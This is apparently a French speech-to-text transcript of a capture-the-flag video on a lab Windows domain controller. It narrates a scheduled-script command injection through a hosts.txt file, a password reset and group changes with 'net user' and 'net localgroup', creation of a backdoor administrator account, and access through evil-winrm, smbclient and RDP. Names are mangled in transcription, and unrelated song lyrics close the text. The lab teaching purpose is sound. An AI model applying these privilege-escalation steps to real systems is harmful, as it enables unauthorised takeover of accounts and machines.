ce qu'on peut faire, je crois que les autres qui sont dans ce fichier seront mis ici si je dis pas de bêtises dans la commande. Donc ce qu'on pourrait faire, c'est injecter la commande qu'on veut exécuter là-dedans. Tout simplement en mettant un point virgule au début et à la fin. Comme, tout comme sous Linux, en fait, quand vous exécutez plusieurs commandes, vous pouvez les séparer par un point virgule. Voilà, c'est pareil. Et on pourrait exécuter ce qu'on veut comme commande en injectant ce qu'on veut. Le truc, c'est que je sais pas en tant que qui s'exécute ce script. Si c'est une tâche automatisée, je pense que ça doit s'exécuter en tant qu'utilisateur système dans la logique. Je peux me tromper, mais je pense que ça devrait être ça. Faut trouver un moyen d'écrire dans ce répertoire. Et le truc, c'est qu'on pourrait juste changer son mot de passe à elle pour accéder à ce fichier host.txt. Juste voir de base hein, si on peut lire ce fichier. Bon, déjà, si on n'a pas le droit de lecture dessus, c'est que permission denied. Voilà, permission denied. On va essayer de changer son mot de passe. Donc, je vais faire net user Britannicr. Comment on change le mot de passe déjà? Donc ouais, on va juste mettre le nouveau mot de passe, password 1, 2, 3, point d'exclamation. La commande a été exécutée avec succès, donc on a bien changé le mot de passe de Britannicr. Le truc c'est qu'en PowerShell, alors il y a une commande qui s'appelle run as. Bon, alors on va essayer un truc. Ce qu'on va essayer de faire c'est de lancer, alors attendez, je vais me mettre dans le bon répertoire. D'ailleurs, je vais déplacer le résultat du scan and map ici. Ce qu'on pourrait essayer de faire, c'est réutiliser evilwinrm-i, mais en tant que britannicr-u, britannicr, et son mot de passe, on a mis password 1, 2, 3, point d'exclamation. Ça a pas l'air de fonctionner, à mon avis, elle fait pas partie du groupe Remote Management. Ça doit être pour ça, hein. Ouais, à mon avis, ça doit être pour ça. Elle doit pas faire partie du groupe Remote Management. Bon, ça, je peux le fermer, exit. Je vais voir si je peux pas l'ajouter au groupe Remote Management. Alors attendez, whoami/group, je vais juste revoir le nom du groupe. Ici c'est un groupe, alors attendez, c'était Remote Management Users, voilà, c'est ça, je vais le copier le nom ici. Alors pour ajouter Remote Management Users, ouais, c'est ce groupe à mon avis, hein, dont on fait partie, c'est pour ça qu'on a pu utiliser evilwinrm. Donc là, pour ajouter un utilisateur à un groupe, on fait net local group, le nom du groupe, que je vais mettre entre guillemets, puisqu'il y a des espaces. Le nom d'utilisateur, donc il y a 2 T pardon, et un N, Britannicr, /add pour dire qu'on ajoute Britannicr au groupe Remote Management Users. La commande a été exécutée avec succès. Alors est-ce que maintenant ça fonctionne? Password 1, 2, 3, point d'exclamation. Ça n'a pas l'air. Peut-être qu'il y a un autre groupe auquel il faudrait appartenir, je sais pas. Ça n'a pas fonctionné. On n'a pas l'autorisation. Je vais regarder à quel groupe on appartient. Pardon, il y a un S à groupe. Je vais regarder à quel groupe on appartient. Il y a peut-être un groupe. C'est peut-être le groupe IT. On va essayer d'ajouter Britannicr au groupe IT. À mon avis, parce que c'est pas local group, c'est groupe tout court. Access denied, ouais, on n'a pas le droit de l'ajouter au groupe IT. À mon avis, c'est le groupe IT qui a le droit de... Bon, écoutez, on va essayer de trouver un autre moyen. On va essayer on va regarder smb client-l si on n'a pas accès à d'autres partages avec Britannicr-l //10. Je peux embêter. winecore.thm, c'est plus rapide. Le nom d'utilisateur qu'on veut utiliser, Britannicr. Le mot de passe c'était password 1, 2, 3, point d'exclamation. Logon failure. Ah, j'avais mal tapé le mot de passe. On a accès au même partage. On n'est pas allé voir ce qu'il y avait dans le partage users. On va voir dans le partage users. Users, c'est ça. Britannicr, password 1, 2, 3, point d'exclamation. On est connecté, ls. Ok, ouais, c'est bien. Alors voilà, c'est ça. Le partage users, en fait, il contient. En fait, c'est un partage qui emmène dans le répertoire users de Windows. c:/users. En fait, c'est l'équivalent du répertoire /home sous Linux. Et là, on a le répertoire de Britannicr. Donc, on va aller dans son répertoire si on a le droit. Britannicr, ls. Et on a le fichier host.txt. On va le récupérer, on va voir déjà ce qu'il y a dedans avant de le modifier. Exit, ls, cat, host.txt. Ok, il y a juste google.com, cisco.com. Ok, bon. Alors, on va modifier ce fichier, nano host.txt. Et on va essayer de voir si on peut s'ajouter net user sibereta alors attendez, comment c'est que je me rappelle plus de la syntaxe pour ajouter un nom d'utilisateur. Net user, nom d'utilisateur. Alors le mot de passe on va mettre le même, password 1, 2, 3, point d'exclamation, /add. Juste mettre ça entre guillemets, on sait jamais. J'ai toujours peur qu'avec les points d'exclamation, ce genre de caractère, ça fasse n'importe quoi. Net user sibereta, password 1, 2, 3, /add. Et on va faire pareil, mais on va s'ajouter au groupe net local group sibereta. Non, pardon. D'abord le nom du groupe, donc administrators. On va s'ajouter au groupe administrators, donc /add. Donc ça aura pour effet de
créer un utilisateur CyberEta avec le mot de passe password 3 et après net local group. Donc ça c'est pour s'ajouter au groupe administrateur local. Voilà, normalement j'ai pas fait de faute. CTRL S, CTRL X. On va se reconnecter au service SMB, password 123 point d'exclamation. On va aller dans le répertoire de Britannic.cr et on va faire put hosts.txt. Il a bien été envoyé le fichier, ok. Et je sais pas, on va essayer de voir normalement si je fais net user CyberEta, est-ce que ça a été créé? Ce username could not be found. Pourquoi je l'ai enregistré sous... Eh mais oui, mais je suis bête aussi. Ouais, pardon, mais je vous dis, je suis fatigué. Hein. Host.txt. Oui, pardon. Host.txt. Voilà, j'ai en fait le fichier, je l'avais appelé host et pas host.txt. Donc j'ai réupload le même fichier en fait. J'ai pas upload le fichier modifié. Ouais, non mais je... 1, 2, 3, point d'exclamation. CD Britannic.cr. Put host.txt. Voilà. Il a bien été envoyé. On va faire exit. Clear. On va attendre un peu. Si je fais net user CyberEta. Ah, username CyberEta. Account active yes. Expires never. Et on fait partie du groupe administrators. Voilà. Ici on voit. Donc ce qu'on va essayer de faire, je pense normalement si on fait partie du groupe administrators, on devrait pouvoir se connecter en bureau à distance. xfreeRDP /v2.10.10 enfin winecore.th /u2.si cybereta /p2.password 123 point d'exclamation entrée. Oui, j'accepte. Oui, je fais confiance au certificat, oui. Ah, c'est bon, c'est bon. On est en train de se connecter, voilà. En bureau à distance. On est connecté en bureau à distance sur la machine. Serveur manager. Ouais, du coup là on va avoir accès à tout parce que quand on a accès à un contrôleur de domaine, en général on peut avoir accès à pas mal de choses. Justement, il me semble que on peut par exemple créer d'autres utilisateurs, en supprimer, réinitialiser le mot de passe. On peut faire beaucoup de choses depuis un contrôleur de domaine. Après ça dépend des services qui sont dessus. Ça me rappelle des souvenirs. Ça fait longtemps que j'ai pas touché à ce genre de truc, mais j'en avais fait en bac pro. J'avais touché à l'Active Directory, tout ça, ces différents services. On va aller du coup dans normalement dans Users, Administrators, Continue. Normalement, d'habitude aussi le flag administrateur sur les machines Windows, il est sur le bureau admin de l'utilisateur administrator. Desktop, ouais c'est ça. On a le troisième flag, on va le copier, on va le renseigner sur TryAcme, CTRL V, Submit, et on a terminé ce CTF qui était vraiment pas mal. Je vais essayer de faire plus de CTF sur Windows. Prochaine vidéo, je pense que j'essaierai de faire le CTF RA2, donc qui est la suite de celui-là, qui normalement sera aussi sur Windows, il me semble. Dans mes souvenirs, il était sur Windows aussi. Ouais, c'était plutôt pas mal. Comme d'habitude, vous aurez toutes les docs utiles hein, dans la description. La doc sur EvilWinRM, pour les docs que j'ai utilisés là par exemple, pour savoir qu'est-ce que peut faire un membre du groupe Account Operators, bon, comment ajouter un utilisateur, etc. Je vous mettrai toutes ces docs là en description hein, si vous avez besoin ou que vous savez pas où. Comme ça vous saurez au moins où je trouve certaines infos. J'espère que ça vous aura plu. N'hésitez pas à me dire ce que vous en avez pensé en commentaire, à liker la vidéo si vous avez aimé. N'hésitez pas à vous abonner si vous voulez voir les prochaines vidéos qui sortiront. Et moi je vous dis à la prochaine. Shots, yeah, straight to the face. And I wanna get lost, I'm sick of this place. Don't know how to stop when I'm feeling this way. So I'm